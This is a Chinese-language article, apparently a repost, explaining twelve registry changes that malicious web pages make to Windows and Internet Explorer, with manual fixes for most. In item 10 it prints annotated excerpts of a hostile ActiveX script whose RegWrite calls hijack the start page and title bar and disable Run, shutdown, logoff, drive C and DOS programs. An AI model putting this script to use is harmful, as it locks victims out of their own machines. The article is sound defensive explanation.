剖析恶意网页修改注册表的十二种现象

剖析恶意网页修改注册表的十二种现象,第1张

1、IE默认连接首页被修改 

IE浏览器上方的标题栏被改成“欢迎访问……网站”的样式,这是最常见的篡改手段,受害者众多。 

受到更改的注册表项目为:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
 

通过修改“Start Page”的键值,来达到修改浏览者IE默认连接首页的目的,如浏览“万花谷”就会将你的IE默认连接首页修改为“http://on888.home.chinaren.com ”,即便是出于给自己的主页做广告的目的,也显得太霸道了一些,这也是这类网页惹人厌恶的原因。 

解决办法: 

①在Windows启动后,点击“开始”→“运行”菜单项,在“打开”栏中键入regedit,然后按“确定”键; 

②展开注册表 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main 

下,在右半部分窗口中找到串值“Start Page”双击 ,将Start Page的键值改为“about:blank”即可; 

③同理,展开注册表到 

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main 

在右半部分窗口中找到串值“Start Page”,然后按②中所述方法处理。 

④退出注册表编辑器,重新启动计算机,一切OK了! 

2、篡改IE的默认页 

有些IE被改了起始页后,即使设置了“使用默认页”仍然无效,这是因为IE起始页的默认页也被篡改啦。具体说来就是以下注册表项被修改: 

HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Default_Page_URL 

“Default_Page_URL”这个子键的键值即起始页的默认页。 

解决办法: 

运行注册表编辑器,然后展开上述子键,将“Default_Page_UR”子键的键值中的那些篡改网站的网址改掉就好了,或者设置为IE的默认值。 

3、修改IE浏览器缺省主页 

并且锁定设置项,禁止用户更改回来。主要是修改了注册表中IE设置的下面这些键值(DWORD值为1时为不可选): 


[HKEY_CURRENT_USER\Software\Policies\Microsoft\
Internet Explorer\Control Panel]
"Settings"=dword:1

[HKEY_CURRENT_USER\Software\Policies\Microsoft\
Internet Explorer\Control Panel]
"Links"=dword:1

[HKEY_CURRENT_USER\Software\Policies\Microsoft\
Internet Explorer\Control Panel]
"SecAddSites"=dword:1
 

解决办法: 

将上面这些DWORD值改为“0”即可恢复功能。 

4、IE的默认首页灰色按扭不可选 

这是由于注册表 

HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\ 

Internet Explorer\Control Panel 

下的DWORD值“homepage”的键值被修改的缘故。原来的键值为“0”,被修改为“1”(即为灰色不可选状态)。 

解决办法: 

将“homepage”的键值改为“0”即可。 

5、IE标题栏被修改 

在系统默认状态下,是由应用程序本身来提供标题栏的信息,但也允许用户自行在上述注册表项目中填加信息,而一些恶意的网站正是利用了这一点来得逞的:它们将串值Window Title下的键值改为其网站名或更多的广告信息,从而达到改变浏览者IE标题栏的目的。 

具体说来受到更改的注册表项目为: 


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\
Main\Window Title
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\
Main\Window Title
 

解决办法: 

①在Windows启动后,点击“开始”→“运行”菜单项,在“打开”栏中键入regedit,然后按“确定”键; 

②展开注册表到 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main 

下,在右半部分窗口中找到串值“Window Title” ,将该串值删除即可,或将Window Title的键值改为“IE浏览器”等你喜欢的名字; 

③同理,展开注册表到 

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main 

然后按②中所述方法处理。 

④退出注册表编辑器,重新启动计算机,运行IE,你会发现困扰你的问题解决了! 

6、IE右键菜单被修改 

受到修改的注册表项目为: 

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt 

下被新建了网页的广告信息,并由此在IE右键菜单中出现! 

解决办法: 

打开注册标编辑器,找到 

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt 

删除相关的广告条文即可,注意不要把下载软件FlashGet和Netants也删除掉啊,这两个可是“正常”的呀,除非你不想在IE的右键菜单中见到它们。 

7、IE默认搜索引擎被修改 

在IE浏览器的工具栏中有一个搜索引擎的工具按钮,可以实现网络搜索,被篡改后只要点击那个搜索工具按钮就会链接到那个篡改网站。出现这种现象的原因是以下注册表被修改: 


HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\
Search\CustomizeSearch
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\
Search\SearchAssistant
 

解决办法: 

运行注册表编辑器,依次展开上述子键,将“CustomizeSearch”的键值以及“SearchAssistant”的键值改为某个搜索引擎的网址即可。 

8、系统启动时d出对话框 

受到更改的注册表项目为:HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon 

在其下被建立了字符串“LegalNoticeCaption”和“LegalNoticeText”,其中“LegalNoticeCaption”是提示框的标题,“LegalNoticeText”是 提示框的文本内容。由于它们的存在,就使得我们每次登陆到Windwos桌面前都出现一个提示窗口,显示那些网页的广告信息!你瞧,多讨厌啊! 

解决办法: 

打开注册表编辑器,找到 

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon 

这一个主键,然后在右边窗口中找到“LegalNoticeCaption”和“LegalNoticeText”这两个字符串,删除这两个字符串就可以解决在登陆时出现提示框的现象了。 

9、浏览网页注册表被禁用 

这是由于注册表 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下的DWORD值“DisableRegistryTools”被修改为“1”的缘故,将其键值恢复为“0”即可恢复注册表的使用。 

解决办法:用记事本程序建立以REG为后缀名的文件,将下面这些内容复制在其中就可以了: 


REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
“DisableRegistryTools”=dword:00000000
 

10、浏览网页开始菜单被修改 

这是最“狠”的一种,让浏览者有生不如死的感觉。浏览后不仅有类似上面所说的那些症状,还会有以下更悲惨的遭遇: 


1)禁止“关闭系统” 
2)禁止“运行” 
3)禁止“注销” 
4)隐藏C盘——你的C盘找不到了!
5)禁止使用注册表编辑器regedit 
6)禁止使用DOS程序
7)使系统无法进入“实模式” 
8)禁止运行任何程序
 

原来,该网页是有人利用Java技术制作的含有有害代码的ActiveX网页文件。为让更多的人了解其危害,查看其源代码,将其主要部分列了出来,并加了详细的注释(文中有“注”字的部分注释)。 

注:下面代码是将你的IE默认连接首页改为http://www.findfeel.com/ 


Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\
Start Page", "http://www.findfeel.com/"); 

注:以下是该网页修改受害者的注册表项所用的招数

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion
\\Policies\\Explorer\\NoRun", 01, "REG_BINARY"); 
注:使受害者系统没有“运行”项,这样用户就不能通过注册表编辑器来修改该有害网页对系统注册表
的修改。

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\Explorer\\NoClose", 01, "REG_BINARY");
注:使受害者系统没有“关闭系统”项

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\Explorer\\NoLogOff", 01, "REG_BINARY"); 
注:使受害者系统没有“注销”项

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD");
注:使受害者系统没有逻辑驱动器C

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\WinOldApp\\ Disabled","REG_BINARY");
注:禁止运行所有的DOS应用程序;

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\ \WinOldApp\\NoRealMode","REG_BINARY");
注:使系统不能启动到“实模式”(传统的DOS模式)下;

又注:进入该网页,它还会修改以下的注册表项,使WINDOWS系统登录时显示一个登录窗口(在
MicroSoft网络用户登录之前)

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Winlogon\\LegalNoticeCaption", "呜啦啦...");
注:这些代码会使窗口的标题是“呜啦啦…”

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Winlogon\\LegalNoticeText", "欢迎你!你这个超级无敌大白痴!《呜啦啦...》故事开始了,按确定
进入悲惨世界"); 
注:上面一行是会在窗口中显示出来的文字

注:下面两行代码修改注册表,使受害者所有的IE窗口都加上以下的标题:“呜啦啦…”

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\
Window Title", "呜啦啦..."); 
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\
Window Title", "呜啦啦..."); 
注:到上面一行为止,完成了对受害者的注册表的所有修改!

注:下面代码用来将其网页增加到受害者的收藏夹中

var WF, Shor, loc; 
WF = FSO.GetSpecialFolder(0); 
loc = WF + "\\Favorites"; 
if(!FSO.FolderExists(loc)) 

loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\
" + Net.UserName + "\\Favorites"; 
if(!FSO.FolderExists(loc)) 

return; 

}

注:下面就是使其网页加入到你的收藏夹的具体代码
AddFavLnk(loc, "找到感觉www.findfeel.com", "http://www.findfeel.com");
 

11、IE中鼠标右键失效 

浏览网页后在IE中鼠标右键失效,点击右键没有任何反应! 

12、查看““源文件”菜单被禁用 

在IE窗口中点击“查看”→“源文件”,发现“源文件”菜单已经被禁用。

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/zaji/2085112.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-07-22
下一篇 2022-07-22

发表评论

登录后才能评论

评论列表(0条)

保存